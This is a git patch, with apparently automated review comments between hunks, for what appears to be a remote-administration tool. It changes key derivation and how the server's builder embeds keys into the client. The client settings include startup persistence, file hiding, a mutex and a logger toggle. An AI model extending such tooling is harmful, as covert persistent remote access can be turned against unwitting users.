From 8da6c2b352c1075bea774b3a167eb62c753c877d Mon Sep 17 00:00:00 2001
From: MaxXor
Date: Fri, 8 Jul 2016 22:20:55 +0200
Subject: [PATCH] Increase iteration count and store derived keys in client #466
---
 Client/Config/Settings.cs | 29 ++++++++++++------------
 Client/Core/Cryptography/AES.cs | 12 +++++++---
 Client/Program.cs | 2 +-
 Server/Core/Build/ClientBuilder.cs | 24 ++++++++++++--------
 Server/Core/Cryptography/AES.cs | 6 ++---
 Server/Core/Helper/CryptographyHelper.cs | 14 +++++++++++-
 6 files changed, 55 insertions(+), 32 deletions(-)
diff --git a/Client/Config/Settings.cs b/Client/Config/Settings.cs
index 7191cebc..b6d995ac 100644
--- a/Client/Config/Settings.cs
+++ b/Client/Config/Settings.cs
@@ -13,7 +13,8 @@ namespace xClient.Config
 public static string VERSION = System.Windows.Forms.Application.ProductVersion;
 public static string HOSTS = "localhost:4782;";
 public static int RECONNECTDELAY = 500;
- public static string PASSWORD = "1234";
+ public static string KEY = "1WvgEMPjdwfqIMeM9MclyQ==";
+ public static string AUTHKEY = "NcFtjbDOcsw7Evd3coMC0y4koy/SRZGydhNmno81ZOWOvdfg7sv0Cj5ad2ROUfX4QMscAIjYJdjrrs41+qcQwg==";
 public static Environment.SpecialFolder SPECIALFOLDER = Environment.SpecialFolder.ApplicationData;
 public static string DIR = Environment.GetFolderPath(SPECIALFOLDER);
 public static string SUBFOLDER = "Test";
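Review bot: The new KEY and AUTHKEY fields hold base64 PBKDF2 output, but nothing in Settings.cs says so or ties them to the derivation the builder performs, while every other string field is a ciphertext that the static initializer later passes through AES.Decrypt (the @@ -62,7 hunk drops the PASSWORD decrypt and adds no KEY/AUTHKEY equivalent, so these two are consumed as stored). A comment on the fields would make the coupling explicit: `// Base64 of the 16-byte key and 64-byte auth key produced by the server's CryptographyHelper.DeriveKeys (Rfc2898DeriveBytes, AES.Salt, 50000 iterations); unlike the other fields these are not wrapped with ENCRYPTIONKEY, so they must not go through AES.Decrypt`. The same comment belongs on the release defaults in the @@ -36,22 hunk, where both values are now "" until the builder patches them.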
@@ -36,22 +37,23 @@ namespace xClient.Config
 }
 #else
 public static string VERSION = "";
- public static string HOSTS = "localhost:4782;";
+ public static string HOSTS = "";
 public static int RECONNECTDELAY = 5000;
- public static string PASSWORD = "1234";
+ public static string KEY = "";
+ public static string AUTHKEY = "";
 public static Environment.SpecialFolder SPECIALFOLDER = Environment.SpecialFolder.ApplicationData;
 public static string DIR = Environment.GetFolderPath(SPECIALFOLDER);
- public static string SUBFOLDER = "SUB";
- public static string INSTALLNAME = "INSTALL";
+ public static string SUBFOLDER = "";
+ public static string INSTALLNAME = "";
 public static bool INSTALL = false;
- public static bool STARTUP = true;
- public static string MUTEX = "MUTEX";
- public static string STARTUPKEY = "STARTUP";
- public static bool HIDEFILE = true;
- public static bool ENABLELOGGER = true;
- public static string ENCRYPTIONKEY = "ENCKEY";
- public static string TAG = "RELEASE";
- public static string LOGDIRECTORYNAME = "Logs";
+ public static bool STARTUP = false;
+ public static string MUTEX = "";
+ public static string STARTUPKEY = "";
+ public static bool HIDEFILE = false;
+ public static bool ENABLELOGGER = false;
+ public static string ENCRYPTIONKEY = "";
+ public static string TAG = "";
+ public static string LOGDIRECTORYNAME = "";
 public static bool HIDELOGDIRECTORY = false;
 public static bool HIDEINSTALLSUBFOLDER = false;
@@ -62,7 +64,6 @@ namespace xClient.Config
 TAG = AES.Decrypt(TAG);
 VERSION = AES.Decrypt(VERSION);
 HOSTS = AES.Decrypt(HOSTS);
- PASSWORD = AES.Decrypt(PASSWORD);
 SUBFOLDER = AES.Decrypt(SUBFOLDER);
 INSTALLNAME = AES.Decrypt(INSTALLNAME);
 MUTEX = AES.Decrypt(MUTEX);
diff --git a/Client/Core/Cryptography/AES.cs b/Client/Core/Cryptography/AES.cs
index 449c35c0..b2848a47 100644
--- a/Client/Core/Cryptography/AES.cs
+++ b/Client/Core/Cryptography/AES.cs
@@ -13,7 +13,7 @@ namespace xClient.Core.Cryptography
 private static byte[] _defaultKey;
 private static byte[] _defaultAuthKey;
- private static readonly byte[] Salt =
+ public static readonly byte[] Salt =
 { 0xBF, 0xEB, 0x1E, 0x56, 0xFB, 0xCD, 0x97, 0x3B, 0xB2, 0x19, 0x2, 0x24, 0x30, 0xA5, 0x78, 0x43, 0x0, 0x3D, 0x56, 0x44, 0xD2, 0x1E, 0x62, 0xB9, 0xD4, 0xF1, 0x80, 0xE7, 0xE6, 0xC3, 0x39, 0x41
@@ -21,13 +21,19 @@ namespace xClient.Core.Cryptography
 public static void SetDefaultKey(string key)
 {
- using (Rfc2898DeriveBytes derive = new Rfc2898DeriveBytes(key, Salt, 2000))
+ using (Rfc2898DeriveBytes derive = new Rfc2898DeriveBytes(key, Salt, 50000))
 {
 _defaultKey = derive.GetBytes(16);
 _defaultAuthKey = derive.GetBytes(64);
 }
 }
+ public static void SetDefaultKey(string key, string authKey)
+ {
+ _defaultKey = Convert.FromBase64String(key);
+ _defaultAuthKey = Convert.FromBase64String(authKey);
+ }
+
 public static string Encrypt(string input, string key)
 {
 return Convert.ToBase64String(Encrypt(Encoding.UTF8.GetBytes(input), Encoding.UTF8.GetBytes(key)));
@@ -94,7 +100,7 @@ namespace xClient.Core.Cryptography
 if (key == null || key.Length == 0) throw new Exception("Key can not be empty.");
 byte[] authKey;
- using (Rfc2898DeriveBytes derive = new Rfc2898DeriveBytes(key, Salt, 2000))
+ using (Rfc2898DeriveBytes derive = new Rfc2898DeriveBytes(key, Salt, 50000))
 {
 key = derive.GetBytes(16);
 authKey = derive.GetBytes(64);
diff --git a/Client/Program.cs b/Client/Program.cs
index 2ffef74f..73b3836b 100644
--- a/Client/Program.cs
+++ b/Client/Program.cs
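Review bot: The new SetDefaultKey(string key, string authKey) overload in the @@ -21,13 hunk accepts whatever Convert.FromBase64String returns, so an empty or wrongly sized value (the release defaults in Settings.cs are "") only fails later at first use, and with a less telling error than the `Key can not be empty.` guard the byte[] Encrypt path at @@ -94,7 raises up front. I would check the decoded lengths against what the PBKDF2 path produces: `if (_defaultKey.Length != 16 || _defaultAuthKey.Length != 64) throw new ArgumentException("Key material must decode to 16 and 64 bytes.");`. A `///` summary on the overload should also state that the two strings are base64 of GetBytes(16) and GetBytes(64) from the builder's derivation, since nothing in the client now documents that. Separately, the 2000→50000 change at @@ -94,7 is paid on every Encrypt/Decrypt call that passes an explicit key rather than once at start-up; if those call sites are hot, caching the derived pair per key is worth considering, and the same applies to the server copy at @@ -94,7 in Server/Core/Cryptography/AES.cs.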
@@ -90,7 +90,7 @@ namespace xClient
 if (!MutexHelper.CreateMutex(Settings.MUTEX) || hosts.IsEmpty || string.IsNullOrEmpty(Settings.VERSION)) // no hosts to connect
 return false;
- AES.SetDefaultKey(Settings.PASSWORD);
+ AES.SetDefaultKey(Settings.KEY, Settings.AUTHKEY);
 ClientData.InstallPath = Path.Combine(Settings.DIR, ((!string.IsNullOrEmpty(Settings.SUBFOLDER)) ? Settings.SUBFOLDER + @"\" : "") + Settings.INSTALLNAME);
 GeoLocationHelper.Initialize();
diff --git a/Server/Core/Build/ClientBuilder.cs b/Server/Core/Build/ClientBuilder.cs
index add29789..4b3c1dac 100644
--- a/Server/Core/Build/ClientBuilder.cs
+++ b/Server/Core/Build/ClientBuilder.cs
@@ -22,7 +22,8 @@ namespace xServer.Core.Build
 public static void Build(BuildOptions options)
 {
 // PHASE 1 - Settings
- string encKey = FileHelper.GetRandomFilename(20);
+ string encKey = FileHelper.GetRandomFilename(20), key, authKey;
+ CryptographyHelper.DeriveKeys(options.Password, out key, out authKey);
 AssemblyDefinition asmDef = AssemblyDefinition.ReadAssembly("client.bin");
 foreach (var typeDef in asmDef.Modules[0].Types)
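Review bot: `string encKey = FileHelper.GetRandomFilename(20), key, authKey;` in the ClientBuilder @@ -22,7 hunk mixes an initialized local with two uninitialized out targets in one declaration, which hides that key and authKey are only assigned by the call on the next line. Splitting it into `string encKey = FileHelper.GetRandomFilename(20);` and `string key, authKey;` (or `out string key, out string authKey` at the call site, if the project's C# version allows out variables) reads more honestly. DeriveKeys also receives options.Password unchecked: a null surfaces as an ArgumentNullException from Rfc2898DeriveBytes and an empty string silently derives keys from "", unless BuildOptions already validates the password somewhere not visible in this diff. The Build method continues past the end of the hunk.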
@@ -47,28 +48,31 @@ namespace xServer.Core.Build
 case 2: //ip/hostname
 methodDef.Body.Instructions[i].Operand = AES.Encrypt(options.RawHosts, encKey);
 break;
- case 3: //password
- methodDef.Body.Instructions[i].Operand = AES.Encrypt(options.Password, encKey);
+ case 3: //key
+ methodDef.Body.Instructions[i].Operand = key;
 break;
- case 4: //installsub
+ case 4: //authkey
+ methodDef.Body.Instructions[i].Operand = authKey;
+ break;
+ case 5: //installsub
 methodDef.Body.Instructions[i].Operand = AES.Encrypt(options.InstallSub, encKey);
 break;
- case 5: //installname
+ case 6: //installname
 methodDef.Body.Instructions[i].Operand = AES.Encrypt(options.InstallName, encKey);
 break;
- case 6: //mutex
+ case 7: //mutex
 methodDef.Body.Instructions[i].Operand = AES.Encrypt(options.Mutex, encKey);
 break;
- case 7: //startupkey
+ case 8: //startupkey
 methodDef.Body.Instructions[i].Operand = AES.Encrypt(options.StartupName, encKey);
 break;
- case 8: //encryption key
+ case 9: //encryption key
 methodDef.Body.Instructions[i].Operand = encKey;
 break;
- case 9: //tag
+ case 10: //tag
 methodDef.Body.Instructions[i].Operand = AES.Encrypt(options.Tag, encKey);
 break;
- case 10: //LogDirectoryName
+ case 11: //LogDirectoryName
 methodDef.Body.Instructions[i].Operand = AES.Encrypt(options.LogDirectoryName, encKey);
 break;
 }
diff --git a/Server/Core/Cryptography/AES.cs b/Server/Core/Cryptography/AES.cs
index 9f33d9b6..86c58438 100644
--- a/Server/Core/Cryptography/AES.cs
+++ b/Server/Core/Cryptography/AES.cs
@@ -13,7 +13,7 @@ namespace xServer.Core.Cryptography
 private static byte[] _defaultKey;
 private static byte[] _defaultAuthKey;
- private static readonly byte[] Salt =
+ public static readonly byte[] Salt =
 { 0xBF, 0xEB, 0x1E, 0x56, 0xFB, 0xCD, 0x97, 0x3B, 0xB2, 0x19, 0x2, 0x24, 0x30, 0xA5, 0x78, 0x43, 0x0, 0x3D, 0x56, 0x44, 0xD2, 0x1E, 0x62, 0xB9, 0xD4, 0xF1, 0x80, 0xE7, 0xE6, 0xC3, 0x39, 0x41
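Review bot: The case numbers in the @@ -47,28 hunk appear to be positional indices over the string-literal operands of the client Settings class (inferred from the `methodDef.Body.Instructions[i].Operand` pattern and from every case shifting by one once KEY and AUTHKEY were inserted after HOSTS), and nothing in the switch records that. A comment above the switch would spare the next person who adds a field from rediscovering it: `// case N = N-th string literal in xClient.Config.Settings; keep in step with the field order there`. It is also worth saying inline that cases 3, 4 and 9 are deliberately left unencrypted (`//key: already-derived material, written as-is like encKey`), because every neighbouring case goes through AES.Encrypt(..., encKey) and the difference reads like an omission. The enclosing loop and switch start before the hunk.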
@@ -21,7 +21,7 @@ namespace xServer.Core.Cryptography
 public static void SetDefaultKey(string key)
 {
- using (Rfc2898DeriveBytes derive = new Rfc2898DeriveBytes(key, Salt, 2000))
+ using (Rfc2898DeriveBytes derive = new Rfc2898DeriveBytes(key, Salt, 50000))
 {
 _defaultKey = derive.GetBytes(16);
 _defaultAuthKey = derive.GetBytes(64);
@@ -94,7 +94,7 @@ namespace xServer.Core.Cryptography
 if (key == null || key.Length == 0) throw new Exception("Key can not be empty.");
 byte[] authKey;
- using (Rfc2898DeriveBytes derive = new Rfc2898DeriveBytes(key, Salt, 2000))
+ using (Rfc2898DeriveBytes derive = new Rfc2898DeriveBytes(key, Salt, 50000))
 {
 key = derive.GetBytes(16);
 authKey = derive.GetBytes(64);
diff --git a/Server/Core/Helper/CryptographyHelper.cs b/Server/Core/Helper/CryptographyHelper.cs
index e1f65638..bdb844f5 100644
--- a/Server/Core/Helper/CryptographyHelper.cs
+++ b/Server/Core/Helper/CryptographyHelper.cs
@@ -1,4 +1,7 @@
-using System.Runtime.CompilerServices;
+using System;
+using System.Runtime.CompilerServices;
+using System.Security.Cryptography;
+using xServer.Core.Cryptography;
 namespace xServer.Core.Helper
 {
@@ -25,5 +28,14 @@ namespace xServer.Core.Helper
 }
 return result;
 }
+
+ public static void DeriveKeys(string password, out string key, out string authKey)
+ {
+ using (Rfc2898DeriveBytes derive = new Rfc2898DeriveBytes(password, AES.Salt, 50000))
+ {
+ key = Convert.ToBase64String(derive.GetBytes(16));
+ authKey = Convert.ToBase64String(derive.GetBytes(64));
+ }
+ }
 }
 }
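Review bot: DeriveKeys in the @@ -25,5 hunk does not validate password, so a null reaches Rfc2898DeriveBytes as an ArgumentNullException and an empty string silently derives a key pair, whereas the byte[] Encrypt path in both AES.cs files rejects an empty key with `Key can not be empty.`; a matching guard would be `if (string.IsNullOrEmpty(password)) throw new ArgumentException("Password can not be empty.", nameof(password));`. The 50000 iteration count is now spelled out in five places (this method, plus SetDefaultKey and the byte[] Encrypt path in both Server and Client AES.cs); since Salt was made public precisely so this helper can share it, a `public const int` beside Salt (for example `KeyDerivationIterations = 50000`) referenced from all five would keep client and server from drifting. The order of the two GetBytes calls is part of the contract, because the second call continues the same Rfc2898DeriveBytes output stream and the client's SetDefaultKey(string, string) overload expects exactly 16 then 64 bytes, so a `///` summary on DeriveKeys should state that key is the first 16 bytes and authKey the following 64, both base64-encoded, and that the call order must not change.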